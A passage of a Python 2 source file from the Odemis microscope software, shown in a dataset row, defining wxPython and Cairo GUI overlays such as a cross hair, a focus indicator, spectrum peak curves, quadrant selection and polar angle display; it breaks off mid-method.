| code<br>stringlengths 2–1.05M | repo_name<br>stringlengths 5–104 | path<br>stringlengths 4–251 | language<br>stringclasses 1 value | license<br>stringclasses 15 values | size<br>int32 2–1.05M |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
:created: 2014-01-25
:author: Rinze de Laat
:copyright: © 2014 Rinze de Laat, Delmic
This file is part of Odemis.
.. license::
Odemis is free software: you can redistribute it and/or modify it under the
terms of the GNU General Public License version 2 as published by the Free
Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
Odemis. If not, see http://www.gnu.org/licenses/.
"""
from __future__ import division
import cairo
import itertools
import logging
import math
import numpy
from odemis import util
from odemis.gui.comp.overlay.base import Label
from odemis.util import peak
import wx
import odemis.gui as gui
import odemis.gui.comp.overlay.base as base
import odemis.model as model
import odemis.util.conversion as conversion
import odemis.util.units as units
class TextViewOverlay(base.ViewOverlay):
""" Render the present labels to the screen """
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
def draw(self, ctx):
if self.labels:
self._write_labels(ctx)
class CrossHairOverlay(base.ViewOverlay):
""" Render a static cross hair to the center of the view """
def __init__(self, cnvs, colour=gui.CROSSHAIR_COLOR, size=gui.CROSSHAIR_SIZE):
base.ViewOverlay.__init__(self, cnvs)
self.colour = conversion.hex_to_frgba(colour)
self.size = size
def draw(self, ctx):
""" Draw a cross hair to the Cairo context """
center = self.cnvs.get_half_view_size()
tl = (center[0] - self.size, center[1] - self.size)
br = (center[0] + self.size, center[1] + self.size)
ctx.set_line_width(1)
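# NB: the fractional (+0.5) offsets below centre each 1 px line on the
# pixel grid, so Cairo renders it crisply instead of anti-aliasing it
# across two pixels.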
# Draw shadow
ctx.set_source_rgba(0, 0, 0, 0.9)
ctx.move_to(tl[0] + 1.5, center[1] + 1.5)
ctx.line_to(br[0] + 1.5, center[1] + 1.5)
ctx.move_to(center[0] + 1.5, tl[1] + 1.5)
ctx.line_to(center[0] + 1.5, br[1] + 1.5)
ctx.stroke()
# Draw cross hair
ctx.set_source_rgba(*self.colour)
ctx.move_to(tl[0] + 0.5, center[1] + 0.5)
ctx.line_to(br[0] + 0.5, center[1] + 0.5)
ctx.move_to(center[0] + 0.5, tl[1] + 0.5)
ctx.line_to(center[0] + 0.5, br[1] + 0.5)
ctx.stroke()
class PlayIconOverlay(base.ViewOverlay):
""" Render Stream (play/pause) icons to the view """
opacity = 0.8
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
self.pause = False # if True: displayed
self.play = 0 # opacity of the play icon
self.colour = conversion.hex_to_frgba(gui.FG_COLOUR_HIGHLIGHT, self.opacity)
def hide_pause(self, hidden=True):
""" Hide or show the pause icon """
self.pause = not hidden
if not self.pause:
self.play = 1.0
wx.CallAfter(self.cnvs.Refresh)
def draw(self, ctx):
if self.show:
if self.pause:
self._draw_pause(ctx)
elif self.play:
self._draw_play(ctx)
if self.play > 0:
self.play -= 0.1 # a tenth less
# Force a refresh (without erase background), to cause a new draw
wx.CallLater(50, self.cnvs.Refresh, False) # in 0.05 s
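# Net effect: the icon fades out in about 0.5 s (ten 0.1-opacity steps,
# one per 50 ms refresh).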
else:
self.play = 0
def _get_dimensions(self):
width = max(16, self.view_width / 10)
height = width
right = self.view_width
bottom = self.view_height
margin = self.view_width / 25
return width, height, right, bottom, margin
def _draw_play(self, ctx):
width, height, right, _, margin = self._get_dimensions()
half_height = height / 2
x = right - margin - width + 0.5
y = margin + 0.5
ctx.set_line_width(1)
ctx.set_source_rgba(
*conversion.hex_to_frgba(
gui.FG_COLOUR_HIGHLIGHT, self.play))
ctx.move_to(x, y)
x = right - margin - 0.5
y += half_height
ctx.line_to(x, y)
x = right - margin - width + 0.5
y += half_height
ctx.line_to(x, y)
ctx.close_path()
ctx.fill_preserve()
ctx.set_source_rgba(0, 0, 0, self.play)
ctx.stroke()
def _draw_pause(self, ctx):
width, height, right, _, margin = self._get_dimensions()
bar_width = max(width / 3, 1)
gap_width = max(width - (2 * bar_width), 1) - 0.5
x = right - margin - bar_width + 0.5
y = margin + 0.5
ctx.set_line_width(1)
ctx.set_source_rgba(*self.colour)
ctx.rectangle(x, y, bar_width, height)
x -= bar_width + gap_width
ctx.rectangle(x, y, bar_width, height)
ctx.set_source_rgba(*self.colour)
ctx.fill_preserve()
ctx.set_source_rgb(0, 0, 0)
ctx.stroke()
class FocusOverlay(base.ViewOverlay):
""" Display the focus modification indicator """
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
self.margin = 10
self.line_width = 16
self.shifts = [None, None] # None or float (m)
self.ppm = (5e6, 5e6) # px/m, conversion ratio m -> px
self.focus_label = self.add_label("", align=wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL)
def draw(self, ctx):
# TODO: Both focuses at the same time, or 'snap' to horizontal/vertical on first motion?
ctx.set_line_width(10)
ctx.set_line_join(cairo.LINE_JOIN_MITER)
ctx.set_source_rgba(1.0, 1.0, 1.0, 0.8)
x, y = self.cnvs.ClientSize
# Horizontal
if self.shifts[0] is not None:
y -= self.margin + (self.line_width // 2)
middle = x / 2
# don't display extremely small values, which are due to accumulation
# of floating point error
shiftm = self.shifts[0]
if abs(shiftm) < 1e-12:
shiftm = 0
shift = shiftm * self.ppm[0]
end_x = middle + (middle * (shift / (x / 2)))
end_x = min(max(self.margin, end_x), x - self.margin)
ctx.move_to(middle, y)
ctx.line_to(end_x, y)
ctx.stroke()
lbl = "focus %s" % units.readable_str(shiftm, 'm', 2)
self.focus_label.text = lbl
self.focus_label.pos = (end_x, y - 15)
self._write_label(ctx, self.focus_label)
# Vertical
if self.shifts[1] is not None:
x -= self.margin + (self.line_width // 2)
middle = y / 2
# don't display extremely small values, which are due to accumulation
# of floating point error
shiftm = self.shifts[1]
if abs(shiftm) < 1e-12:
shiftm = 0
shift = shiftm * self.ppm[1]
end_y = middle - (middle * (shift / (y / 2)))
end_y = min(max(self.margin, end_y), y - self.margin)
ctx.move_to(x, middle)
ctx.line_to(x, end_y)
ctx.stroke()
lbl = "focus %s" % units.readable_str(shiftm, 'm', 2)
self.focus_label.text = lbl
self.focus_label.pos = (x - 15, end_y)
self._write_label(ctx, self.focus_label)
def add_shift(self, shift, axis):
""" Adds a value on the given axis and updates the overlay
shift (float): amount added to the current value (can be negative)
axis (int): axis for which this happens
"""
if self.shifts[axis] is None:
self.shifts[axis] = shift
else:
self.shifts[axis] += shift
self.cnvs.Refresh()
def clear_shift(self):
logging.debug("Clearing focus shift")
self.shifts = [None, None]
self.cnvs.Refresh()
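# Usage sketch (hypothetical; assumes a canvas with this overlay attached):
#   overlay = FocusOverlay(cnvs)
#   overlay.add_shift(1e-6, 0)  # show a 1 um focus move on the horizontal bar
#   overlay.clear_shift()       # hide both indicators again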
class ViewSelectOverlay(base.ViewOverlay, base.SelectionMixin):
def __init__(self, cnvs, colour=gui.SELECTION_COLOUR, center=(0, 0)):
base.ViewOverlay.__init__(self, cnvs)
base.SelectionMixin.__init__(self, colour, center, base.EDIT_MODE_BOX)
self.position_label = self.add_label("")
def draw(self, ctx, shift=(0, 0), scale=1.0):
if self.select_v_start_pos and self.select_v_end_pos:
start_pos = self.select_v_start_pos
end_pos = self.select_v_end_pos
# logging.debug("Drawing from %s, %s to %s. %s", start_pos[0],
# start_pos[1],
# end_pos[0],
# end_pos[1] )
rect = (start_pos[0] + 0.5,
start_pos[1] + 0.5,
end_pos[0] - start_pos[0],
end_pos[1] - start_pos[1])
# draws a light black background for the rectangle
ctx.set_line_width(2)
ctx.set_source_rgba(0, 0, 0, 0.5)
ctx.rectangle(*rect)
ctx.stroke()
# draws the dotted line
ctx.set_line_width(1.5)
ctx.set_dash([2])
ctx.set_line_join(cairo.LINE_JOIN_MITER)
ctx.set_source_rgba(*self.colour)
ctx.rectangle(*rect)
ctx.stroke()
self._debug_draw_edges(ctx)
self.position_label.pos = start_pos
def on_left_down(self, evt):
""" Start drag action if enabled, otherwise call super method so event will propagate """
if self.active:
base.SelectionMixin._on_left_down(self, evt)
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
""" End drag action if enabled, otherwise call super method so event will propagate """
if self.active:
base.SelectionMixin._on_left_up(self, evt)
base.ViewOverlay.on_left_up(self, evt)
def on_motion(self, evt):
""" Process drag motion if enabled, otherwise call super method so event will propagate """
if self.active:
base.SelectionMixin._on_motion(self, evt)
base.ViewOverlay.on_motion(self, evt)
class MarkingLineOverlay(base.ViewOverlay, base.DragMixin):
""" Draw a vertical line at the given view position
Provides a .val VA indicating the selected position by the user (using mouse).
"""
HORIZONTAL = 1
VERTICAL = 2
def __init__(self, cnvs, colour=gui.SELECTION_COLOUR, orientation=None, map_y_from_x=False):
"""
map_y_from_x (bool): If True, the Y coordinate of the value will be
based on the data, obtained via cnvs.val_x_to_val(), and .val will
contain None as Y => 1D movement.
If False, both X and Y will be based on the mouse position (2D movement).
"""
base.ViewOverlay.__init__(self, cnvs)
base.DragMixin.__init__(self)
self.label = None
self.colour = conversion.hex_to_frgba(colour)
self.map_y_from_x = map_y_from_x
# highlighted position (in the data format, but not necessarily part of the data)
self.val = model.VigilantAttribute(None) # tuple (X, Y) or None
self._x_label = self.add_label("", colour=self.colour)
self._y_label = self.add_label("", colour=self.colour, align=wx.ALIGN_BOTTOM)
self.orientation = orientation or self.HORIZONTAL
self.label_orientation = self.orientation
self.line_width = 2
@property
def x_label(self):
return self._x_label
@x_label.setter
def x_label(self, lbl):
if self.label_orientation & self.VERTICAL:
self._x_label.text = lbl
@property
def y_label(self):
return self._y_label
@y_label.setter
def y_label(self, lbl):
self._y_label.text = lbl
def clear_labels(self):
self.val.value = None
def hide_x_label(self):
self.label_orientation = self.HORIZONTAL
# Event Handlers
def on_left_down(self, evt):
if self.active:
base.DragMixin._on_left_down(self, evt)
self.colour = self.colour[:3] + (0.5,)
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
if self.active:
base.DragMixin._on_left_up(self, evt)
self.colour = self.colour[:3] + (1.0,)
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_left_up(self, evt)
def on_motion(self, evt):
if self.active and self.left_dragging:
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_motion(self, evt)
# END Event Handlers
def _store_event_pos(self, evt):
""" Position the focus line at the position of the given mouse event """
x, y = evt.GetPositionTuple()
x = max(1, min(self.view_width, x))
if self.map_y_from_x:
# Y will be automatically mapped at drawing
val = self.cnvs.pos_x_to_val_x(x, snap=False), None
else:
y = max(1, min(self.view_height, y))
val = self.cnvs.pos_to_val((x, y), snap=False)
self.val.value = val
def draw(self, ctx):
ctx.set_line_width(self.line_width)
ctx.set_dash([3])
ctx.set_line_join(cairo.LINE_JOIN_MITER)
ctx.set_source_rgba(*self.colour)
if self.val.value is not None:
val = self.val.value
if self.map_y_from_x:
# Maps Y and also snap X to the closest X value in the data
val = self.cnvs.val_x_to_val(val[0])
v_pos = self.cnvs.val_to_pos(val)
self.x_label = units.readable_str(val[0], self.cnvs.unit_x, 3)
self.y_label = units.readable_str(val[1], self.cnvs.unit_y, 3)
# v_posx, v_posy = self.v_pos.value
if self.orientation & self.VERTICAL:
ctx.move_to(v_pos[0], 0)
ctx.line_to(v_pos[0], self.cnvs.ClientSize.y)
ctx.stroke()
if self.orientation & self.HORIZONTAL:
ctx.move_to(0, v_pos[1])
ctx.line_to(self.cnvs.ClientSize.x, v_pos[1])
ctx.stroke()
if self.x_label.text:
self.x_label.pos = (v_pos[0] + 5, self.cnvs.ClientSize.y)
self._write_label(ctx, self.x_label)
if self.y_label.text:
yp = max(0, v_pos[1] - 5) # Padding from line
# Increase bottom margin if x label is close
label_padding = 30 if v_pos[0] < 50 else 0
yn = min(self.view_height - label_padding, yp)
self.y_label.pos = (2, yn)
self._write_label(ctx, self.y_label)
r, g, b, a = conversion.change_brightness(self.colour, -0.2)
ctx.set_source_rgba(r, g, b, 0.5)
ctx.arc(v_pos[0], v_pos[1], 5.5, 0, 2 * math.pi)
ctx.fill()
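# The orientation constants are bit flags, so both lines can be combined
# into a cross-hair marker (hypothetical usage):
#   MarkingLineOverlay(cnvs, orientation=MarkingLineOverlay.HORIZONTAL |
#                                        MarkingLineOverlay.VERTICAL)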
class CurveOverlay(base.ViewOverlay, base.DragMixin):
""" Draw a curve at the given view position
"""
def __init__(self, cnvs, colour=gui.FG_COLOUR_CURVE, colour_peaks=gui.FG_COLOUR_PEAK, length=256):
base.ViewOverlay.__init__(self, cnvs)
base.DragMixin.__init__(self)
self.length = length # curve length
self.label = None
self.colour = conversion.hex_to_frgba(colour, 0.5)
self.colour_peaks = conversion.hex_to_frgba(colour_peaks)
# The current highlighted position
self.selected_wl = None # in same unit as the range
self.peaks = None # list of peak data
self.peak_offset = None
self.range = None # array of wl/px
self.unit = None # str
self.type = None # str
# Cached computation of the peak curve. The global curve is index None
self._curves = {} # wavelength/None -> list of values
self.list_labels = []
self.width_labels = []
self.amplitude_labels = []
self.peak_labels = []
self.line_width = 2
# Event Handlers
def on_left_down(self, evt):
if self.active:
base.DragMixin._on_left_down(self, evt)
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
if self.active:
base.DragMixin._on_left_up(self, evt)
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_left_up(self, evt)
def on_motion(self, evt):
if self.active and self.left_dragging:
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_motion(self, evt)
# END Event Handlers
def clear_labels(self):
self.peaks = None
def _store_event_pos(self, evt):
""" Position the focus line at the position of the given mouse event """
x, y = evt.GetPositionTuple()
if self.peaks is not None:
# Store in the same format as the data, so it still works after resize
x = max(min(self.view_width, x), 1)
width = self.range[-1] - self.range[0]
self.selected_wl = self.range[0] + x / self.view_width * width
else:
self.selected_wl = None
def update_data(self, peak_data, peak_offset, spectrum_range, unit, type):
"""
peak_data (list of tuple of 3 floats): series of (pos, width, amplitude)
peak_offset (float): initial offset
spectrum_range (list of floats): wavelength/pixel for each pixel in the original spectrum data
unit (str): m or px
type (str): peak fitting method, 'gaussian' or 'lorentzian'
"""
self.peaks = peak_data
self.peak_offset = peak_offset
self.range = spectrum_range
self.unit = unit
self.type = type
self._curves = {} # throw away the cache
self.cnvs.Refresh()
def draw(self, ctx):
peaks = self.peaks
rng = self.range
if (peaks is None) or (self.type is None):
return
# If original range is too small, create a finer one
if len(rng) < self.length * 0.9:
rng = numpy.linspace(rng[0], rng[-1], self.length)
# Compute the label and global curve on the first time needed
if None not in self._curves:
self.width_labels = []
self.amplitude_labels = []
self.peak_labels = []
for pos, width, amplitude in peaks:
self.peak_labels.append(units.readable_str(pos, self.unit, 3))
self.width_labels.append(units.readable_str(width, self.unit, 3))
self.amplitude_labels.append(units.readable_str(amplitude, None, 3))
self._curves[None] = peak.Curve(rng, peaks, self.peak_offset, type=self.type)
curve = self._curves[None]
step = max(1, len(rng) // self.length)
rng_first = rng[0]
rng_last = rng[-1]
rng_n = rng[1::step]
mn, mx = min(curve), max(curve)
if mn == mx:
logging.info("Global peak curve is flat, not displaying")
return
client_size_x = self.cnvs.ClientSize.x
client_size_y = self.cnvs.ClientSize.y
ctx.set_line_width(self.line_width)
ctx.set_dash([3])
ctx.set_line_join(cairo.LINE_JOIN_MITER)
ctx.set_source_rgba(*self.colour)
curve_drawn = []
curve_n = curve[1::step]
for x, y in itertools.izip(rng_n, curve_n):
x_canvas = (((x - rng_first) * (client_size_x - 1)) / (rng_last - rng_first)) + 1
y_canvas = (((y - mn) * (client_size_y - 1)) / (mx - mn)) + 1
y_canvas = client_size_y - y_canvas
ctx.line_to(x_canvas, y_canvas)
curve_drawn.append((x_canvas, y_canvas))
ctx.stroke()
# Draw the peak and peak label
peaks_canvpos = []
# Depends on canvas size so always update
for pos, width, amplitude in peaks:
peaks_canvpos.append(int((((pos - rng_first) * (client_size_x - 1)) / (rng_last - rng_first)) + 1))
ctx.set_source_rgba(*self.colour_peaks)
self.list_labels = []
for p_label, p_pos in zip(self.peak_labels, peaks_canvpos):
ctx.move_to(p_pos - 3, client_size_y)
ctx.line_to(p_pos, client_size_y - 16)
ctx.line_to(p_pos + 3, client_size_y)
ctx.line_to(p_pos - 3, client_size_y)
ctx.fill()
peak_tuple = min(curve_drawn, key=lambda p:abs(p[0] - p_pos))
peak_label = Label(
text=p_label,
pos=(p_pos, peak_tuple[1] - 20),
font_size=12,
flip=True,
align=wx.ALIGN_LEFT | wx.ALIGN_TOP,
colour=self.colour_peaks, # default to white
opacity=1.0,
deg=None
)
self.labels.append(peak_label)
self.list_labels.append(peak_label)
# Draw the peak curve (if the user has selected a wavelength)
if self.selected_wl is not None and peaks:
# Find closest peak
peak_i = util.index_closest(self.selected_wl, [p for (p, w, a) in peaks]) # peak pos
peak_pos = peaks[peak_i][0]
peak_margin = (rng_last - rng_first) / (5 * len(peaks))
if abs(peak_pos - self.selected_wl) <= peak_margin:
if peak_i not in self._curves:
self._curves[peak_i] = peak.Curve(rng, [peaks[peak_i]], self.peak_offset, type=self.type)
single_curve = self._curves[peak_i]
ctx.set_source_rgba(*self.colour)
x_canvas = 1
y_canvas = client_size_y - 1
ctx.move_to(x_canvas, y_canvas)
curve_n = single_curve[1::step]
for x, y in itertools.izip(rng_n, curve_n):
x_canvas = (((x - rng_first) * (client_size_x - 1)) / (rng_last - rng_first)) + 1
y_canvas = (((y - mn) * (client_size_y - 1)) / (mx - mn)) + 1
y_canvas = client_size_y - y_canvas
ctx.line_to(x_canvas, y_canvas)
x_canvas = client_size_x
y_canvas = client_size_y - 1
ctx.line_to(x_canvas, y_canvas)
ctx.fill()
# Add more info to that specific peak label
self.list_labels[peak_i].text += "\nWidth: " + self.width_labels[peak_i] + "\nAmplitude: " + self.amplitude_labels[peak_i]
for pl in self.list_labels:
self._write_label(ctx, pl)
class DichotomyOverlay(base.ViewOverlay):
""" This overlay allows the user to select a sequence of nested quadrants
within the canvas. The quadrants are numbered 0 to 3, from the top left to
the bottom right. The first quadrant is the biggest, with each subsequent
quadrant being nested in the one before it.
"""
TOP_LEFT = 0
TOP_RIGHT = 1
BOTTOM_LEFT = 2
BOTTOM_RIGHT = 3
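# Example: the sequence [0, 3] selects the top-left quadrant of the view,
# then the bottom-right quadrant nested inside it.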
def __init__(self, cnvs, sequence_va, colour=gui.SELECTION_COLOUR):
""" :param sequence_va: (ListVA) VA to store the sequence in
"""
base.ViewOverlay.__init__(self, cnvs)
self.colour = conversion.hex_to_frgba(colour)
# Color for quadrant that will expand the sequence
self.hover_forw = conversion.hex_to_frgba(colour, 0.5)
# Color for quadrant that will cut the sequence
self.hover_back = conversion.change_brightness(self.hover_forw, -0.2)
self.sequence_va = sequence_va
self.sequence_rect = []
# This attribute is used to track the position of the mouse cursor.
# The first value denotes the smallest quadrant (in size) in the
# sequence and the second one the quadrant index number that will
# be added if the mouse is clicked.
# This value should be set to (None, None) if the mouse is outside the
# canvas or when we are not interested in updating the sequence.
self.hover_pos = (None, None)
# maximum number of sub-quadrants (6->2**6 smaller than the whole area)
self.max_len = 6
self.sequence_va.subscribe(self.on_sequence_change, init=True)
# Disabling the overlay will allow the event handlers to ignore events
self.active = False
def on_sequence_change(self, seq):
if not all([0 <= v <= 3 for v in seq]):
raise ValueError("Illegal quadrant values in sequence!")
rect = 0, 0, self.view_width, self.view_height
self.sequence_rect = [rect]
for i, q in enumerate(seq):
rect = self.index_to_rect(i, q)
self.sequence_rect.append(rect)
self.cnvs.Refresh()
def _reset(self):
""" Reset all attributes to their default values and get the dimensions
from the canvas.
"""
logging.debug("Reset")
self.sequence_va.value = []
# Event Handlers
def on_leave(self, evt):
""" Event handler called when the mouse cursor leaves the canvas """
if self.active:
# When the mouse cursor leaves the overlay, the current top quadrant
# should be highlighted, so clear the hover_pos attribute.
self.hover_pos = (None, None)
self.cnvs.Refresh()
else:
base.ViewOverlay.on_leave(self, evt)
def on_motion(self, evt):
""" Mouse motion event handler """
if self.active:
self._update_hover(evt.GetPosition())
else:
base.ViewOverlay.on_motion(self, evt)
def on_left_down(self, evt):
""" Prevent the left mouse button event from propagating when the overlay is active"""
if not self.active:
base.ViewOverlay.on_motion(self, evt)
def on_dbl_click(self, evt):
""" Prevent the double click event from propagating if the overlay is active"""
if not self.active:
base.ViewOverlay.on_dbl_click(self, evt)
def on_left_up(self, evt):
""" Mouse button handler """
if self.active:
# If the mouse cursor is over a selectable quadrant
if None not in self.hover_pos:
idx, quad = self.hover_pos
# If we are hovering over the 'top' quadrant, add it to the sequence
if len(self.sequence_va.value) == idx:
new_seq = self.sequence_va.value + [quad]
new_seq = new_seq[:self.max_len] # cut if too long
# Jump to the desired quadrant otherwise, cutting the sequence
else:
# logging.debug("Trim")
new_seq = self.sequence_va.value[:idx] + [quad]
self.sequence_va.value = new_seq
self._update_hover(evt.GetPosition())
else:
base.ViewOverlay.on_leave(self, evt)
def on_size(self, evt):
""" Called when size of canvas changes
"""
# Force the re-computation of rectangles
self.on_sequence_change(self.sequence_va.value)
base.ViewOverlay.on_size(self, evt)
# END Event Handlers
def _update_hover(self, pos):
idx, quad = self.quad_hover(pos)
# Change the cursor into a hand if the quadrant being hovered over
# can be selected. Use the default cursor otherwise
if idx >= self.max_len:
self.cnvs.reset_dynamic_cursor()
idx, quad = (None, None)
else:
self.cnvs.set_dynamic_cursor(wx.CURSOR_HAND)
# Redraw only if the quadrant changed
if self.hover_pos != (idx, quad):
self.hover_pos = (idx, quad)
self.cnvs.Refresh()
def quad_hover(self, vpos):
""" Return the sequence index number of the rectangle at position vpos
and the quadrant vpos is over inside that rectangle.
:param vpos: (int, int) The viewport x,y hover position
"""
# Loop over the rectangles, smallest one first
for i, (x, y, w, h) in reversed(list(enumerate(self.sequence_rect))):
if x <= vpos.x <= x + w:
if y <= vpos.y <= y + h:
# If vpos is within the rectangle, we can determine the
# quadrant.
# Remember that the quadrants are numbered as follows:
#
# 0 | 1
# --+--
# 2 | 3
# Construct the quadrant number by starting with 0
quad = 0
# If the position is in the right half, add 1 to the quadrant
if vpos.x > x + w / 2:
quad += 1
# If the position is in the bottom half, add 2
if vpos.y > y + h / 2:
quad += 2
return i, quad
return None, None
def index_to_rect(self, idx, quad):
""" Translate given rectangle and quadrant into a view rectangle
:param idx: (int) The index number of the rectangle in sequence_rect
that we are going to use as a base.
:param quad: (int) The quadrant number
:return: (int, int, int, int) Rectangle tuple of the form x, y, w, h
"""
x, y, w, h = self.sequence_rect[idx]
# The new rectangle will have half the size of the base one
w /= 2
h /= 2
# If the quadrant is in the right half, construct x by adding half the
# width to the x position of the base rectangle.
if quad in (self.TOP_RIGHT, self.BOTTOM_RIGHT):
x += w
# If the quadrant is in the bottom half, construct y by adding half the
# height to the y position of the base rectangle.
if quad in (self.BOTTOM_LEFT, self.BOTTOM_RIGHT):
y += h
return x, y, w, h
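# Worked example: if sequence_rect[0] == (0, 0, 800, 600), then
# index_to_rect(0, 3) returns the bottom-right quadrant at half size,
# i.e. x=400, y=300, w=400, h=300.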
def draw(self, ctx):
ctx.set_source_rgba(*self.colour)
ctx.set_line_width(2)
ctx.set_dash([2])
ctx.set_line_join(cairo.LINE_JOIN_MITER)
# Draw previous selections as dashed rectangles
for rect in self.sequence_rect:
# logging.debug("Drawing ", *args, **kwargs)
ctx.rectangle(*rect)
ctx.stroke()
# If the mouse is over the canvas
if None not in self.hover_pos:
idx, quad = self.hover_pos
# If the mouse is over the smallest selected quadrant
if idx == len(self.sequence_va.value):
# Mark quadrant to be added
ctx.set_source_rgba(*self.hover_forw)
rect = self.index_to_rect(idx, quad)
ctx.rectangle(*rect)
ctx.fill()
else:
# Mark higher quadrant to 'jump' to
ctx.set_source_rgba(*self.hover_back)
rect = self.index_to_rect(idx, quad)
ctx.rectangle(*rect)
ctx.fill()
# Mark current quadrant
ctx.set_source_rgba(*self.hover_forw)
ctx.rectangle(*self.sequence_rect[-1])
ctx.fill()
# If the mouse is not over the canvas
elif self.sequence_va.value and self.sequence_rect:
# Mark the currently selected quadrant
ctx.set_source_rgba(*self.hover_forw)
ctx.rectangle(*self.sequence_rect[-1])
ctx.fill()
class PolarOverlay(base.ViewOverlay):
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
self.canvas_padding = 0
# Rendering attributes
self.center_x = None
self.center_y = None
self.radius = None
self.inner_radius = None
self.tau = 2 * math.pi
self.num_ticks = 6
self.ticks = []
self.ticksize = 10
# Value attributes
self.px, self.py = None, None
self.tx, self.ty = None, None
self.colour = conversion.hex_to_frgb(gui.SELECTION_COLOUR)
self.colour_drag = conversion.hex_to_frgba(gui.SELECTION_COLOUR, 0.5)
self.colour_highlight = conversion.hex_to_frgb(gui.FG_COLOUR_HIGHLIGHT)
self.intensity_label = self.add_label("", align=wx.ALIGN_CENTER_HORIZONTAL,
colour=self.colour_highlight)
self.phi = None # Phi angle in radians
self.phi_line_rad = None # Phi drawing angle in radians (is phi -90)
self.phi_line_pos = None # End point in pixels of the Phi line
self.phi_label = self.add_label("", colour=self.colour,
align=wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_BOTTOM)
self.theta = None # Theta angle in radians
self.theta_radius = None # Radius of the theta circle in pixels
self.theta_label = self.add_label("", colour=self.colour,
align=wx.ALIGN_CENTER_HORIZONTAL)
self.intersection = None # The intersection of the circle and line in pixels
self.dragging = False
# Calculate the characteristic values for the first time
self.on_size()
# Property Getters/Setters
@property
def phi_rad(self):
return self.phi
@phi_rad.setter
def phi_rad(self, phi_rad):
self.phi = phi_rad
self._calculate_phi()
self.cnvs.Refresh()
@property
def phi_deg(self):
return math.degrees(self.phi)
@phi_deg.setter
def phi_deg(self, phi_deg):
self.phi_rad = math.radians(phi_deg)
@property
def theta_rad(self):
return self.theta
@theta_rad.setter
def theta_rad(self, theta_rad):
self.theta = theta_rad
self.theta_radius = (theta_rad / (math.pi / 2)) * self.inner_radius
self._calculate_theta()
self.cnvs.Refresh()
@property
def theta_deg(self):
return math.degrees(self.theta)
@theta_deg.setter
def theta_deg(self, theta_deg):
self.theta_rad = math.radians(theta_deg)
# END Property Getters/Setters
def _calculate_phi(self, view_pos=None):
""" Calcualate the Phi angle and the values to display the Phi line """
if view_pos:
vx, vy = view_pos
dx, dy = vx - self.center_x, self.center_y - vy
# Calculate the phi angle in radians
# Atan2 gives the angle between the positive x axis and the point
# dx,dy
self.phi = math.atan2(dx, dy) % self.tau
if self.phi:
self.phi_line_rad = self.phi - math.pi / 2
cos_phi_line = math.cos(self.phi_line_rad)
sin_phi_line = math.sin(self.phi_line_rad)
# Pixel to which to draw the Phi line to
phi_x = self.center_x + self.radius * cos_phi_line
phi_y = self.center_y + self.radius * sin_phi_line
self.phi_line_pos = (phi_x, phi_y)
# Calc Phi label pos
# Calculate the view point on the line where to place the label
if self.theta_radius > self.inner_radius / 2:
radius = self.inner_radius * 0.25
else:
radius = self.inner_radius * 0.75
x = self.center_x + radius * cos_phi_line
y = self.center_y + radius * sin_phi_line
self.phi_label.text = u"φ %0.1f°" % math.degrees(self.phi)
self.phi_label.deg = math.degrees(self.phi_line_rad)
# Now we calculate a perpendicular offset to the Phi line where
# we can plot the label. It is also determined if the label should
# flip, depending on the angle.
if self.phi < math.pi:
ang = -math.pi / 2.0 # -90 deg
self.phi_label.flip = False
else:
ang = math.pi / 2.0 # 90 deg
self.phi_label.flip = True
# Calculate a point further down the line that we will rotate
# around the calculated label x,y. By translating (-x and -y) we
# 'move' the origin to label x,y
rx = (self.center_x - x) + (radius + 5) * cos_phi_line
ry = (self.center_y - y) + (radius + 5) * sin_phi_line
# Apply the rotation
lx = rx * math.cos(ang) - ry * math.sin(ang)
ly = rx * math.sin(ang) + ry * math.cos(ang)
# Translate back to our original origin
lx += x
ly += y
self.phi_label.pos = (lx, ly)
def _calculate_theta(self, view_pos=None):
""" Calculate the Theta angle and the values needed to display it. """
if view_pos:
vx, vy = view_pos
dx, dy = vx - self.center_x, self.center_y - vy
# Get the radius and the angle for Theta
self.theta_radius = min(math.sqrt(dx * dx + dy * dy),
self.inner_radius)
self.theta = (math.pi / 2) * (self.theta_radius / self.inner_radius)
elif self.theta:
self.theta_radius = (self.theta / (math.pi / 2)) * self.inner_radius
else:
return
# Calc Theta label pos
x = self.center_x
y = self.center_y + self.theta_radius + 3
theta_str = u"θ %0.1f°" % math.degrees(self.theta)
self.theta_label.text = theta_str
self.theta_label.pos = (x, y)
def _calculate_intersection(self):
if None not in (self.phi_line_rad, self.theta_radius):
# Calculate the intersection between Phi and Theta
x = self.center_x + self.theta_radius * math.cos(self.phi_line_rad)
y = self.center_y + self.theta_radius * math.sin(self.phi_line_rad)
self.intersection = (x, y)
else:
self.intersection = None
def _calculate_display(self, view_pos=None):
""" Calculate the values needed for plotting the Phi and Theta lines and labels
If view_pos is not given, the current Phi and Theta angles will be used.
"""
self._calculate_phi(view_pos)
self._calculate_theta(view_pos)
self._calculate_intersection()
# if (view_pos and 0 < self.intersection[0] < self.cnvs.ClientSize.x and
# 0 < self.intersection[1] < self.cnvs.ClientSize.y):
# # FIXME: Determine actual value here
# #self.intensity_label.text = ""
# pass
# Event Handlers
def on_left_down(self, evt):
if self.active:
self.dragging = True
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
if self.active:
self._calculate_display(evt.GetPositionTuple())
self.dragging = False
self.cnvs.Refresh()
base.ViewOverlay.on_left_up(self, evt)
def on_motion(self, evt):
# Only change the values when the user is dragging
